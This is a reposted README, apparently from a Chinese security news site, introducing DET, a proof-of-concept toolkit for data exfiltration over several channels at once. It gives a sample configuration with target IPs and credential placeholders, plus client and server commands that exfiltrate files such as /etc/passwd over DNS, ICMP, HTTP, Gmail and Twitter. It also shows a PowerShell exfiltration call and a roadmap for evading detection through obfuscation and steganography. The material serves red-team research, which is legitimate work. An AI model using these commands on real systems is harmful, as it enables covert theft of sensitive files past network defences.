神刀安全网

Introducing DET, (extensible) Data Exfiltration Toolkit

DET (extensible) Data Exfiltration Toolkit

DET (is provided AS IS), is a proof of concept to perform Data Exfiltration using either single or multiple channel(s) at the same time. The idea was to create a generic toolkit to plug any kind of protocol/service.

Slides

DET has been presented at BSides Ljubljana on the 9th of March 2016 and the slides will be available here. Soon.

Example usage (ICMP plugin)

Server-side:

Introducing DET, (extensible) Data Exfiltration Toolkit

Client-side:

Introducing DET, (extensible) Data Exfiltration Toolkit

Usage while combining two channels (Gmail/Twitter)

Server-side:

Introducing DET, (extensible) Data Exfiltration Toolkit

Client-side:

Introducing DET, (extensible) Data Exfiltration Toolkit

Installation

Clone the repo:

git clone https://github.com/sensepost/DET.git

Then:

pip install -r requirements.txt --user

Configuration

In order to use DET, you will need to configure it and add your proper settings (eg. SMTP/IMAP credentials and so on). A configuration example file has been provided and is called: config-sample.json

{     "plugins": {         "http": {             "target": "192.168.1.101",             "port": 8080         },         "google_docs": {             "target": "192.168.1.101",             "port": 8080,         },         "dns": {             "key": "google.com",             "target": "192.168.1.101",             "port": 53         },         "gmail": {             "username": "dataexfil@gmail.com",             "password": "ReallyStrongPassword",             "server": "smtp.gmail.com",             "port": 587         },         "tcp": {             "target": "192.168.1.101",             "port": 6969         },         "twitter": {             "username": "PaulWebSec",             "CONSUMER_TOKEN": "XXXXXXXXX",             "CONSUMER_SECRET": "XXXXXXXXX",             "ACCESS_TOKEN": "XXXXXXXXX",             "ACCESS_TOKEN_SECRET": "XXXXXXXXX"         },         "icmp": {             "target": "192.168.1.101"         }     },     "XOR_KEY": "THISISACRAZYKEY",     "sleep_time": 10 }

Usage

Help usage

python det.py -h usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]               [-L]  Data Exfiltration Toolkit (SensePost)  optional arguments:   -h, --help  show this help message and exit   -c CONFIG   Configuration file (eg. '-c ./config-sample.json')   -f FILE     File to exfiltrate (eg. '-f /etc/passwd')   -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')   -p PLUGIN   Plugins to use (eg. '-p dns,twitter')   -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')   -L          Server mode

Server-side:

To load every plugin:

python det.py -L -c ./config.json

To load only twitter and gmail modules:

python det.py -L -c ./config.json -p twitter,gmail

To load every plugin and exclude DNS:

python det.py -L -c ./config.json -e dns

Client-side:

To load every plugin:

python det.py -c ./config.json -f /etc/passwd

To load only twitter and gmail modules:

python det.py -c ./config.json -p twitter,gmail -f /etc/passwd

To load every plugin and exclude DNS:

python det.py -c ./config.json -e dns -f /etc/passwd

And in PowerShell (HTTP module):

PS C:/Users/user01/Desktop> PS C:/Users/user01/Desktop> . ./http_exfil.ps1 PS C:/Users/user01/Desktop> HTTP-exfil 'C:/path/to/file.exe'

Modules

So far, DET supports multiple protocols, listed here:

  • HTTP(S)
  • ICMP
  • DNS
  • SMTP/IMAP (eg. Gmail)
  • Raw TCP
  • PowerShell implementation (HTTP, DNS, ICMP, SMTP (used with Gmail))

And other "services":

  • Google Docs (Unauthenticated)
  • Twitter (Direct Messages)

Experimental modules

So far, I am busy implementing new modules which are almost ready to ship, including:

  • Skype (95% done)
  • Tor (80% done)
  • Github (30/40% done)

Limitations

Data so far is not encrypted and just HEX/XOR’ed which can be detected if deep analysis is done. I plan to add encryption soon (such as Public-key cryptography )

Roadmap

  • Compression (extremely important!)
  • Add proper encryption (eg. AES-256)
  • Proper data obfuscation and integratingMarkovobfuscate
  • FTP, FlickRLSB Steganography and Youtube modules

References

Some pretty cool references/credits to people I got inspired by with their project:

Contact/Contributing

You can reach me on Twitter @PaulWebSec . Feel free if you want to contribute, clone, fork, submit your PR and so on.

License

DET is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International . Permissions beyond the scope of this license may be available atinfo@sensepost.com

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » Introducing DET, (extensible) Data Exfiltration Toolkit

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮